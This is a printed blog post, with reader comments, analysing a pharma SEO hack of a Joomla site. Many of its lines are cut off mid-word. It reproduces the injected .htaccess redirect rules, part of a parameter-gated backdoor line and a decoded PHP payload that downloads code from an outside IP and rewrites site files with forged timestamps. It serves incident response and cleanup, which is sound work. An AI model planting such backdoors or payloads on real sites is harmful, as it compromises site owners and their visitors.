Joomla Pharma Hack Peter Tasker

http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/

Blog at WordPress.com. | The Widely Theme.

Internet Thoughts

July 23, 2012

One of the more CSI type things I get to do in my job is figure out how servers a uring out why a site was listing Pharmaceuticals in Google results. Ive dealt alot with hacked and compromised servers, but have never come acro Basically, 3 modified files kept appearing on the server, a modified .htaccess file What we discovered was the following in the .htaccess file: 1 2 3 4 5 6 7 8 9 10 11 #Apachesearchqueriesstatisticmodule <IfModulemod_rewrite.c> RewriteEngineOn RewriteCond%{HTTP_USER_AGENT}(google|yahoo|aol|bing|craw RewriteCond%{HTTP_REFERER}(google|aol|yahoo|msn|search| RewriteCond%{REQUEST_URI}/$[OR] RewriteCond%{REQUEST_FILENAME}(shtml|html|htm|php|xml|p RewriteCond%{REQUEST_FILENAME}!common.php RewriteCond%{DOCUMENT_ROOT}/common.phpf RewriteRule^.*$/common.php[L] </IfModule>

What this means is that any search bot will get redirected through common.php. that modified page meta descriptions and titles. This is outlined pretty well here: macy-hack.html. However, we deleted these files and modified the .htaccess file back to its origin big question was how? I did a search through the Joomla source for base64_encode/decode and found or core, but I did find a few that looked a little odd. For example: 1 /**GnPvQdChUa*/if((md5($_REQUEST["img_id"])=="ae6d32585e

Basically what this does is run whatever is passed in the $_REQUEST["mod_co any base64_encoded string will be run as is. At 6:22 on a sunny Saturday morning, I got a notification from one of my monito

1 de 6

08/09/2013 8:21

Joomla Pharma Hack Peter Tasker

http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/

back! I checked the logs and sure enough, here is what the request was:

/components/com_users/users.php?img_id=1f3870be274f6c

That param decodes to a lovely PHP script: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 if(extension_loaded("curl" )){ $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,"http://209.190.20.51/doo curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0(compa curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $door=curl_exec($ch); $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,"http://209.190.20.51/inc curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0(compa curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $inc_code=curl_exec($ch); $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,"http://209.190.20.51/inc curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0(compa curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $inc_ht=curl_exec($ch); }else{ $door=@file_get_contents("http://209.190.20.51/door.t $inc_code=@file_get_contents("http://209.190.20.51/in $inc_ht=@file_get_contents("http://209.190.20.51/incl }if(is_file("/home/user/public_html/index.html")){ $index="/home/user/public_html/index.html"; }if(is_file("/home/user/public_html/index.htm")){ $index="/home/user/public_html/index.htm"; }if(is_file("/home/user/public_html/.htaccess")){ $index="/home/user/public_html/.htaccess"; }if(is_file("/home/user/public_html/favicon.ico")) $index="/home/user/public_html/favicon.ico"; }if(is_file("/home/user/public_html/index.php")){ $index="/home/user/public_html/index.php"; }if(is_file("/home/user/public_html/common.php")){ $index="/home/user/public_html/common.php"; }$time=filemtime($index); $chmod=substr(sprintf("%o",fileperms($index)),4 $chmod=trim($chmod); $chmod=intval($chmod,8); @unlink("/home/user/public_html/common.php"); $fp=fopen("/home/user/public_html/common.php","w"); fputs($fp,$door); fclose($fp); @chmod("/home/user/public_html/common.php",$chmod); touch("/home/user/public_html/common.php",$time); $htaccess=str_replace("#####INCLUDE#####",$inc_ht,$ @unlink("/home/user/public_html/.htaccess"); $fp=fopen("/home/user/public_html/.htaccess","w"); fputs($fp,$htaccess); fclose($fp); @chmod("/home/user/public_html/.htaccess",$chmod); touch("/home/user/public_html/.htaccess",$time );

This little script is what recreates all the spammy files.

2 de 6

08/09/2013 8:21

Joomla Pharma Hack Peter Tasker

http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/

So there it is, a URL param that runs CURL requests to setup spam files on a s Wanted to record this so that anyone else having this issue has somewhere to lo TTFN.
About these ads

Share this: Like this: Be the first to like this. This entry was posted in Code, Joomla. Bookmark the permalink.

WordPress pagination on custom posts

Fac

8 COMMENTS

Luc | July 25, 2012 at 12:32 pm

Hi I have the same on my site.. search for a mod_joomla.php in my case.. Witch is the first file created and what is the best way to prevent this attack? Reply

petetasker | July 25, 2012 at 1:50 pm

Change all your FTP, Joomla passwords and I would disable Jumi or Sourcerer Best way to prevent it is to keep Joomla patched and up to date and dont instal of.

3 de 6

08/09/2013 8:21

Joomla Pharma Hack Peter Tasker

http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/

Check out the vulnerable extensions list (http://docs.joomla.org/Vulnerable_Exte cure upload form that was included in a page using Jumi. Also, search the source code for any base64_encode() or eval() statements. Reply

sam | November 19, 2012 at 5:51 pm

Found out that if you rename your admin folder to something other (hasnt shown up after the usual couple of hours at least). Maybe

FlyingPizzas | November 8, 2012 at 11:21 am

Found the same hack on a Drupal site. Thanks for your post as it helped us to identify the pro Reply

Stacy Holmstedt | November 24, 2012 at 7:39 pm

Looks like this has hit WordPress now, too. Instead of coockies.txt theres a folder called coo new files. After sifting through server logs, I noticed a few hacked files in my wp-themes folde stall-list-table.php and wp-admin/load-styles.php. Hacked files start with <?php and some md running wp-cron.php. I also noticed an empty folder called .logs in my root and wonder if that elsewhere). Thanks for the post, it was a good start. Reply

petetasker | November 28, 2012 at 3:54 pm

Ya the site that was originally infected was moved to another webhost and thing Im thinking it has something to do with log files as well, because even after rem file came back. Reply

Erik Stenman | February 7, 2013 at 12:31 am

I found a file located at /en/rss.php containing a remote access terminal.

4 de 6

08/09/2013 8:21

Joomla Pharma Hack Peter Tasker

http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/

Reply

aquaholic | February 7, 2013 at 8:08 pm

I had this same probelm recently and got rid of the three files you mention at the beginning of later it is back. These files no longer exist but the problem is back. Any idea what to look for? I am not nearly as techie with the scripts and looking at logs so some good old fashioned han Many thanks, Houston Reply

LEAVE A REPLY

ABOUT PETER

TWEETS
Serious game of flip cup. #HRCBigDay http://t.co/kAPzyDnNVp 1 week ago HVAC recommendations in Ottawa? Need a new a/c and furnace. 1 month ago I don't know how I have not been using curl to test form submissions for this long. 1 month ago

5 de 6

08/09/2013 8:21

Joomla Pharma Hack Peter Tasker

http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/

I've just taken the WordPress 2013 User and Developer Survey, have you? wp-survey.polldaddy.com/s/wp July the 4th be with youhuh? 2 months ago

Follow @petetasker

RECENT POSTS
2012 in review Facebook JS SDK API Post Image to Feed Facebook Set Auto Grow A version that actually works Joomla Pharma Hack WordPress pagination on custom posts

CATEGORIES
Code Facebook General Joomla WordPress WordPress VIP

6 de 6

08/09/2013 8:21